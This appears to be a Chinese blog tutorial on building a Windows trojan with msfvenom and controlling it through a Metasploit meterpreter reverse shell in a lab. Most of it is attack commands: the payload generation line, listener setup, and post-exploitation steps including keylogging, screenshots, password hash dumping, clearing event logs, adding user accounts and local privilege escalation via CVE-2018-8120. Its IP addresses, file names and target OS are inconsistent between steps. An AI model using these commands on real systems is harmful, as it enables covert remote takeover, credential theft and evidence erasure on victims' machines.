MSF生成一个木马与使用

原理:

利用msf模块中的msfvenom模块,首先生成.exe木马文件,用测试机打开,攻击成功后,就渗透到了靶机系统中。

准备:

目标:win7 x64专业版
攻击主机:Kali IP:192.168.1.143

生成:

生成test.exe木马文件
Step1:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.110 LPORT=12345 -f exe > /root/test.exe
在这里插入图片描述

使用:

Step1:输入msfconsole进入metasploit
MSF生成一个木马与使用_第1张图片

Step2:进入监听模块
Use exploit/multi/handler
在这里插入图片描述

Step3:设置payload反弹
Set payload windows/meterpreter/reverse_tcp
在这里插入图片描述

Step4:设置LHOST、LPORT参数
set LHOST 192.168.1.143(要监听的本地IP)
set LPORT 12345(要监听本地端口)
在这里插入图片描述

Step5:exploit攻击开始
在这里插入图片描述

Step6:把生成的木马文件hacker.exe拷贝到靶机WinXP系统中
在测试机中运行该exe文件,回到kali
在这里插入图片描述
出现该界面,表示渗透成功,可以对测试机进行一波操作了。

meterpreter下的命令:
getwd 当前目录
dir 查看所有文件
cat c:\123.txt 查看文件123.txt内容(数据是字符串传递,所以加一个转义字符\)
search -f cmd.exe (搜索名为cmd.exe文件所在目录)
upload /root/桌面/backldoor.exe(要上传的文件) -> c:\(上传到的目录) 上传文件
download c:\123txt /root 下载文件
clearev 清除日志
getuid 当前用户
ps 查看所用进程
kill 杀死某个进程
sysinfo 系统信息

键盘记录
keyscan_start 开始键盘记录
keyscan_dump 查看结果
keyscan_stop

屏幕截图
screenshot

屏幕监控
run vnc

获取密文密码
hashdump

shell
获取shell,进入cmd

cmd下(测试机是windows):

dir:显示所有文件
cd:切换目录
whoami 查看当前用户级别
net user 查看用户列表
net user 用户名 密码 /add 添加用户
net user 用户名 密码 更改用户密码

演示一下上传漏洞实现本地提权
CVE-2018-8120.exe (漏洞目录在kali的/root/CVE-2018-8120.exe)
MSF生成一个木马与使用_第2张图片

出现了乱码现象,这是编码的问题,在编辑->首选项->兼容性->修改编码—>改成中文的GB2312退出再次shell
MSF生成一个木马与使用_第3张图片
CVE-2018-8120.exe ‘whoami’ 运行,有些机子可以,有些不可以。

你可能感兴趣的:(kali_linux的使用,木马)